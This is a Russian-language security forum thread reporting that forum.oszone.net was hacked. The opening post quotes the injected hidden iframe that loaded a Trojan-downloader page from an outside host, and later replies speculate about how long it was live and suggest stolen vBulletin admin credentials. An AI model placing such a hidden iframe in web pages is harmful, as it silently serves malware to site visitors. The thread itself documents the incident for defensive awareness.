Вредносный скрипт на forum.oszone.net - Общий форум по информационной безопасности - Форумы Anti-Malware.ru Перейти к содержанию
vaber

Вредносный скрипт на forum.oszone.net

Recommended Posts

vaber

На этом форуме http://forum.oszone.net/ встроен вредоносный скрипт

<iframe src="http://nerik.info/Alex/index.php" width="0" height="0" style="display:none"></iframe>

Веб-антивирус Касперского детектирует наличие скрипта при посещении данного сайта и позволяет его блокировать (обнаружено: троянская программа Trojan-Downloader.VBS.Psyme.fc URL: hxxp://nerik.info/Alex/index.php//Crypt.DCScript).

Вероятно сайт был взломан и злоумышленник разместил свой скрипт.

На данный момент скрипт удален.

Но как минимум сутки он пробыл, а вероятно и больше.

http://forum.kaspersky.com/index.php?showt...mp;#entry314232

Причем постоянно на озоновском форуме находиться более полутысячи человек.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
vaber
Эээ нет он меньше суток был, его пофиксили, потом опять кто-то залил..

Меньше суток с того момента, когда на http://forum.kaspersky.com разместили данную информацию. Сколько он до этого там находился - неизвестно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Ego1st

на газоне думаю это быстро обнаружилось..

хотя небуду спорить малоли чего и где было..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Форум у них на движке vBulletin.

Досточно было получить учетные данные админа, чтобы внести изменения в html-шаблоны форума/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Пожалуй можно добавить команду: > Сбросить все атрибуты файлов каталогов - ориентируясь на указанную дату. 2025-01-14 17:17 - 2025-01-14 17:17 - 000000000
      2025-01-14 17:16 - 2025-01-14 07:50 - 000000000
      2025-01-14 17:15 - 2025-01-14 07:50 - 000000000
      2025-01-14 17:13 - 2025-01-14 11:00 - 000000000 Или даже удаление для: 000 - по дате    
    • PR55.RP55
      Dragokas По работе с программой: https://forum.esetnod32.ru/forum8/topic15785/ В программе есть возможность поиска.
      Вместо категории: Подозрительные и вирусы выберите категорию.
      Выберите поиск по имени, или пути файла.
      Для нормальной работы курсор должен быть на одной из строк. ( Имя ; Каталог ; Статус ; Производитель ) Так:
    • Dragokas
      Приветствую! Можно реализовать поиск (или фильтр) среди найденных объектов (вот как Ctrl + F в текстовых редакторах), или такое уже есть? Например, выбираешь категорию "Все файлы", и тебя интересует увидеть все строки, в средине которых есть определённое слово.
    • demkd
      ---------------------------------------------------------
       4.99.10
      ---------------------------------------------------------
       o При активации небезопасных параметров запуска добавлено предупреждение с перечислением этих параметров.

       o Параметры запуска "Заморозить потоки внедренные в uVS" и "Выгружать DLL" объединены в один параметр
         "Выгружать DLL и уничтожать потоки внедренные в uVS".

       o Исправлена ошибка в функции выгрузки DLL из uVS.

       o Исправлена ошибка разбора параметров для исполняемых файлов с именем содержащим 2 точки.
         (например file.txt.exe)

       o Исправлена ошибка в функции удалении задачи по имени отсутствующего XML-файла задачи.

       o Исправлена ошибка в парсере json.
         Теперь в лог выводится участок json вызвавший ошибку разбора.
       
    • demkd
      тут только присылать мне файлы указанные в логе, буду разбираться что там не так. они именно не удаляются или это сообщения в логе при построении списка?
×